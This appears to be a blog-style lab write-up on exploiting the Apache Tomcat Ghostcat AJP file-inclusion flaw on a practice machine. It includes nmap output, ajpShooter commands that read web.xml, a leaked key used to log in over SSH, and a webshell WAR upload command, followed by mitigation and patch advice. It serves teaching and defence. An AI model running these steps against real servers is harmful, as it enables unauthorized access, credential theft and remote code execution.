Hunting and Exploiting the Apache Ghostcat

just_a_noob
5 min readMay 30, 2020

The Apache Ghostcat vulnerability is a file inclusion vulnerability which came out in the first quarter of this year while the world was gearing up for a lockdown fight up against the coronavirus.

It allows any attacker to read files such as configuration files , test files or any other tomcat directory files . In addition, if a victim website permits any user to upload files, an attacker can upload the file containing malicious JSP code to the server and then include the uploaded file by exploiting the Ghostcat vulnerability, resulting in remote code execution. Well like the coronavirus’s family of viruses this ghostcat bug has also been there since a long long time and has managed to be undiscovered until the recent past. The context of the short blog post is to comprehend, identify and exploit this notorious bug.

The general idea of a Tomcat server has different ports set up . There’s of course the 8080 HTTP webservice port. Then there is another lesser known port 8009 which runs the AJP (Apache JServ Protocol) service. It is essentially a service implemented through tomcat and allows for performing different operations.

What is the AJP fuss all about…?

Well, the AJP is a binary protocol that reduces overhead for an application server in comparison to the HTTP. It is similar to HTTP but at a binary level. Since it is binary , the machine level translation is far more faster than the HTTP parsing. In short , AJP connector will be used due to:

  1. It being implemented and exposed by default by Tomcat.
  2. More persistance in reverse proxying requests performance and load balancing between front end and backend application servers.
  3. Tomcat’s rich API level implementations juices the developer to push for more faster protocol transversal i.e; HTTP(S) data is seamless and can be retrieved with simple API calls(like canonical getXYX()).
  4. AJP allows you to skip the additional parsing and pass efficient binary interpretation of the request headers between the proxy server and the app server.

Ways to detect the Ghostcat vulnerability

  1. You can use the online detection tool by the researchers that have published the finding. (Link: https://www.chaitin.cn/en/ghostcat)

2. The Manual way.

The Manual way of finding it:

As always in any manual penetration test we do perform an Nmap scan to detect open ports.

sh-3.2# nmap -sS -sV -T2 10.10.54.51Starting Nmap 7.80 ( https://nmap.org ) at 2020-05-29 23:54 ISTNmap scan report for 10.10.54.51Host is up (0.19s latency).Not shown: 996 closed portsPORT     STATE SERVICE    VERSION22/tcp   open  ssh        OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)53/tcp   open  tcpwrapped8009/tcp open  ajp13      Apache Jserv (Protocol v1.3)8080/tcp open  http       Apache Tomcat 9.0.30Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Apache Tomcat versions 6.x, 7.x, 8.x, and 9.x are found to be vulnerable to this Ghostcat issue.

Once we find the desired ports highlighted in the results above you can head to this github exploit page: https://github.com/00theway/Ghostcat-CNVD-2020-10487. and run the python exploit.

sh-3.2# python3 ajpShooter.py http://10.10.54.51:8080/ 8009 /WEB-INF read[<] 302 302[<] Location: /index.txt/[<] Content-Length: 0

We are able to retrieve information. Now we can try to retrieve certain common files from the WEB-INF folder such as web.xml

sh-3.2# python3 ajpShooter.py http://10.10.54.51:8080/ 8009 /WEB-INF/web.xml read
[<] 200 200[<] Accept-Ranges: bytes[<] ETag: W/"1261-1583902632000"[<] Last-Modified: Wed, 21 Apr 2020 04:57:12 GMT[<] Content-Type: application/xml[<] Content-Length: 1261<?xml version="1.0" encoding="UTF-8"?><!--Licensed to the Apache Software Foundation (ASF) under one or morecontributor license agreements. See the NOTICE file distributed withthis work for additional information regarding copyright ownership.The ASF licenses this file to You under the Apache License, Version 2.0.See the License for the specific language governing permissions andlimitations under the License.--><web-app xmlns="http://xmlns.jcp.org/xml/ns/javaee"xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"xsi:schemaLocation="http://xmlns.jcp.org/xml/ns/javaeehttp://xmlns.jcp.org/xml/ns/javaee/web-app_4_0.xsd"version="4.0"metadata-complete="true"><display-name>Welcome to Tomcat</display-name><description>Welcome to ECorpECorp:8730281lkjlkjdqlksalks</description></web-app>

We found a string (8730281lkjlkjdqlksalks)that appears as key which could possibly be used to login to system called ECorp with a key via an SSH session.

sh-3.2# ssh ECorp@10.10.54.51The authenticity of host '10.10.54.51 (10.10.54.51)' can't be established.ECDSA key fingerprint is SHA256:hNxvmz+AG4q06z8p74FfXZldHr0HJsaa1FBXSoTlnss.Are you sure you want to continue connecting (yes/no)? yesWarning: Permanently added '10.10.54.51' (ECDSA) to the list of known hosts.ECorp@10.10.54.51's password: <enter the key here>Welcome to Ubuntu 16.04.6 LTS (GNU/Linux 4.4.0-174-generic x86_64)* Documentation:  https://help.ubuntu.com* Management:     https://landscape.canonical.com* Support:        https://ubuntu.com/advantageThe programs included with the Ubuntu system are free software;the exact distribution terms for each program are described in theindividual files in /usr/share/doc/*/copyright.Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted byapplicable law.ECorp@ubuntu:~$ whoami
ECorp
E-Foundation@ubuntu:/etc$ uname -a
Linux ubuntu 4.4.0-174-generic #204-Ubuntu SMP Wed Apr 29 06:41:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux

That’s it we can own the system and retrieve information from the user ECorp and can also possibly look for root level escalations if there are any misconfigurations in the system.

If the application server allows uploading files as well which is uncommon collectively in general , then we can upload WAR files such as :

$ python tomcat.py upload -u tomcat -p tomcat webshell.war 10.10.54.51

and gain a code execution using this issue.

More on it here: (https://github.com/hypn0s/AJPy/tree/3854891450e06064b50be1bad6217fd82e5c78e0)

Conclusion:

Ghostcat continues to be one of the severe issues that can be troublesome just like the coronavirus. Threat actors may mass exploit using shodan dorks as well. The suggested mitigation would be to disable the port by commenting out the block of code that enables the port to listen on 8009 using AJP connector.

It is also recommended to upgrade to the following Apache versions that have applied a patch:

  1. Apache Tomcat Version 9.0.31
  2. Apache Tomcat Version 8.5.51
  3. Apache Tomcat Version 7.0.100

For the beginners to practice such vulnerabilities there are good platforms such as TryHackme.com that have made excellent machines to solve and understand such new exploits. You can head over there and solve labs based on such vulnerabilities yourself.

Thanks for the read as always stay safe and healthy during these corona.war times :}.Peas out.

You can connect with me on :

Linkedin: www.linkedin.com/in/prakashashok22 and Twitter:https://twitter.com/prakashashok4

--

--

just_a_noob
just_a_noob

Written by just_a_noob

Prakash Ashok, Security Lead at WeSecureApp, CTF player, Blockchain developer and Security Researcher.

No responses yet